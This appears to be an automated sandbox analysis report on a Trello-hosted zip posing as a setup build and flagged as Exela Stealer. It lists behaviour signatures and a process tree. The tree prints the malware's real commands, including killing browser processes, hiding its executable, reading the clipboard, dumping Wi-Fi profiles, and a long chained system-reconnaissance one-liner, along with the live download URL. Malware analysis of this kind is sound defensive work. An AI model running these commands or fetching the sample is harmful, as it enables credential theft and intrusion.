Analysis
-
max time kernel
150s -
max time network
272s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 10:10
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip
Resource
win10v2004-20240709-en
General
-
Target
https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2580 netsh.exe 2352 netsh.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4536 cmd.exe 4436 powershell.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 68 discord.com 69 discord.com 70 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 ip-api.com -
pid Process 3360 cmd.exe 2388 ARP.EXE -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4440 tasklist.exe 5580 tasklist.exe 5884 tasklist.exe 4244 tasklist.exe 5828 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4600 cmd.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1124 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3948 netsh.exe 5960 cmd.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 2996 NETSTAT.EXE -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 4844 WMIC.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5512 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 4984 ipconfig.exe 2996 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4236 systeminfo.exe -
Kills process with taskkill 8 IoCs
pid Process 5140 taskkill.exe 5312 taskkill.exe 3932 taskkill.exe 2552 taskkill.exe 5904 taskkill.exe 3916 taskkill.exe 1688 taskkill.exe 6072 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 836 msedge.exe 836 msedge.exe 1952 msedge.exe 1952 msedge.exe 908 identity_helper.exe 908 identity_helper.exe 5264 msedge.exe 5264 msedge.exe 4436 powershell.exe 4436 powershell.exe 4436 powershell.exe 1688 powershell.exe 1688 powershell.exe 1688 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 5512 WMIC.exe Token: SeSecurityPrivilege 5512 WMIC.exe Token: SeTakeOwnershipPrivilege 5512 WMIC.exe Token: SeLoadDriverPrivilege 5512 WMIC.exe Token: SeSystemProfilePrivilege 5512 WMIC.exe Token: SeSystemtimePrivilege 5512 WMIC.exe Token: SeProfSingleProcessPrivilege 5512 WMIC.exe Token: SeIncBasePriorityPrivilege 5512 WMIC.exe Token: SeCreatePagefilePrivilege 5512 WMIC.exe Token: SeBackupPrivilege 5512 WMIC.exe Token: SeRestorePrivilege 5512 WMIC.exe Token: SeShutdownPrivilege 5512 WMIC.exe Token: SeDebugPrivilege 5512 WMIC.exe Token: SeSystemEnvironmentPrivilege 5512 WMIC.exe Token: SeRemoteShutdownPrivilege 5512 WMIC.exe Token: SeUndockPrivilege 5512 WMIC.exe Token: SeManageVolumePrivilege 5512 WMIC.exe Token: 33 5512 WMIC.exe Token: 34 5512 WMIC.exe Token: 35 5512 WMIC.exe Token: 36 5512 WMIC.exe Token: SeIncreaseQuotaPrivilege 5540 WMIC.exe Token: SeSecurityPrivilege 5540 WMIC.exe Token: SeTakeOwnershipPrivilege 5540 WMIC.exe Token: SeLoadDriverPrivilege 5540 WMIC.exe Token: SeSystemProfilePrivilege 5540 WMIC.exe Token: SeSystemtimePrivilege 5540 WMIC.exe Token: SeProfSingleProcessPrivilege 5540 WMIC.exe Token: SeIncBasePriorityPrivilege 5540 WMIC.exe Token: SeCreatePagefilePrivilege 5540 WMIC.exe Token: SeBackupPrivilege 5540 WMIC.exe Token: SeRestorePrivilege 5540 WMIC.exe Token: SeShutdownPrivilege 5540 WMIC.exe Token: SeDebugPrivilege 5540 WMIC.exe Token: SeSystemEnvironmentPrivilege 5540 WMIC.exe Token: SeRemoteShutdownPrivilege 5540 WMIC.exe Token: SeUndockPrivilege 5540 WMIC.exe Token: SeManageVolumePrivilege 5540 WMIC.exe Token: 33 5540 WMIC.exe Token: 34 5540 WMIC.exe Token: 35 5540 WMIC.exe Token: 36 5540 WMIC.exe Token: SeDebugPrivilege 5580 tasklist.exe Token: SeIncreaseQuotaPrivilege 5512 WMIC.exe Token: SeSecurityPrivilege 5512 WMIC.exe Token: SeTakeOwnershipPrivilege 5512 WMIC.exe Token: SeLoadDriverPrivilege 5512 WMIC.exe Token: SeSystemProfilePrivilege 5512 WMIC.exe Token: SeSystemtimePrivilege 5512 WMIC.exe Token: SeProfSingleProcessPrivilege 5512 WMIC.exe Token: SeIncBasePriorityPrivilege 5512 WMIC.exe Token: SeCreatePagefilePrivilege 5512 WMIC.exe Token: SeBackupPrivilege 5512 WMIC.exe Token: SeRestorePrivilege 5512 WMIC.exe Token: SeShutdownPrivilege 5512 WMIC.exe Token: SeDebugPrivilege 5512 WMIC.exe Token: SeSystemEnvironmentPrivilege 5512 WMIC.exe Token: SeRemoteShutdownPrivilege 5512 WMIC.exe Token: SeUndockPrivilege 5512 WMIC.exe Token: SeManageVolumePrivilege 5512 WMIC.exe Token: 33 5512 WMIC.exe Token: 34 5512 WMIC.exe Token: 35 5512 WMIC.exe Token: 36 5512 WMIC.exe -
Suspicious use of FindShellTrayWindow 50 IoCs
pid Process 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe 1952 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1952 wrote to memory of 4772 1952 msedge.exe 84 PID 1952 wrote to memory of 4772 1952 msedge.exe 84 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 3952 1952 msedge.exe 85 PID 1952 wrote to memory of 836 1952 msedge.exe 86 PID 1952 wrote to memory of 836 1952 msedge.exe 86 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 PID 1952 wrote to memory of 2940 1952 msedge.exe 87 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5008 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe681c46f8,0x7ffe681c4708,0x7ffe681c47182⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:22⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:82⤵PID:2940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:82⤵PID:2860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵PID:692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:2320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:12⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5188 /prefetch:82⤵PID:4232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:60
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2228,9820103379377183957,1789251665762397505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5264
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3404
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4232
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5524
-
C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe"C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe"1⤵PID:5220
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"2⤵PID:5336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"2⤵PID:3500
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"2⤵PID:856
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"2⤵PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:2812
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"2⤵PID:5628
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer3⤵PID:456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:5684
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:5776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:5700
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""2⤵
- Hide Artifacts: Hidden Files and Directories
PID:4600 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"3⤵
- Views/modifies file attributes
PID:5008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:5972
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:4244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1952"2⤵PID:4272
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19523⤵
- Kills process with taskkill
PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4772"2⤵PID:3988
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47723⤵
- Kills process with taskkill
PID:3916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3952"2⤵PID:4988
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39523⤵
- Kills process with taskkill
PID:1688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 836"2⤵PID:3220
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8363⤵
- Kills process with taskkill
PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2940"2⤵PID:6092
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29403⤵
- Kills process with taskkill
PID:5140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1616"2⤵PID:5456
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16163⤵
- Kills process with taskkill
PID:5312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5108"2⤵PID:4916
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 51083⤵
- Kills process with taskkill
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 60"2⤵PID:5608
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 603⤵
- Kills process with taskkill
PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"2⤵PID:4800
-
C:\Windows\system32\cmd.execmd.exe /c chcp3⤵PID:5708
-
C:\Windows\system32\chcp.comchcp4⤵PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"2⤵PID:1972
-
C:\Windows\system32\cmd.execmd.exe /c chcp3⤵PID:5872
-
C:\Windows\system32\chcp.comchcp4⤵PID:372
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:2160
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"2⤵
- Clipboard Data
PID:4536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard3⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5960 -
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"2⤵
- Network Service Discovery
PID:3360 -
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:4236
-
-
C:\Windows\system32\HOSTNAME.EXEhostname3⤵PID:4216
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername3⤵
- Collects information from the system
PID:4844
-
-
C:\Windows\system32\net.exenet user3⤵PID:3276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:2740
-
-
-
C:\Windows\system32\query.exequery user3⤵PID:3144
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"4⤵PID:232
-
-
-
C:\Windows\system32\net.exenet localgroup3⤵PID:2940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:2016
-
-
-
C:\Windows\system32\net.exenet localgroup administrators3⤵PID:3540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:4304
-
-
-
C:\Windows\system32\net.exenet user guest3⤵PID:3840
-
